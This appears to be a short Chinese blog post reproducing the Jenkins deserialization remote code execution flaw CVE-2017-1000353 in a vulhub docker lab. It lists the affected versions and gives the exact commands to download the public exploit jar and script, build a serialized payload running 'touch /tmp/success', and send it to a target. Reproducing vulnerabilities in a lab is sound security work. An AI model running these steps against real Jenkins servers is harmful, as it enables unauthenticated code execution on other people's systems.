Jenkins 远程代码执行漏洞 CVE-2017-1000353 复现

水下月 2021-01-29
Web安全 发布于 2021-01-29 14:17:27 阅读 100 评论 0

漏洞原因

Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限

漏洞范围:

Jenkins影响(包括<=2.56)
Jenkins LTS 影响( 包括<=2.46.1)

漏洞环境搭建

使用阿里云vulhub和docker搭建环境
cd /vulhub/jenkins/CVE-2017-1000353
docker-compose up -d

漏洞复现

wget https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

获取CVE-2017-1000353这是生成POC的工具

执行下面命令,生成字节码文件:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

下载https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py,python3执行python exploit.py http://your-ip:8080 jenkins_poc.ser,将刚才生成的字节码文件发送给目标:


进入docker,/tmp/success成功被创建,说明命令执行利用成功:

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!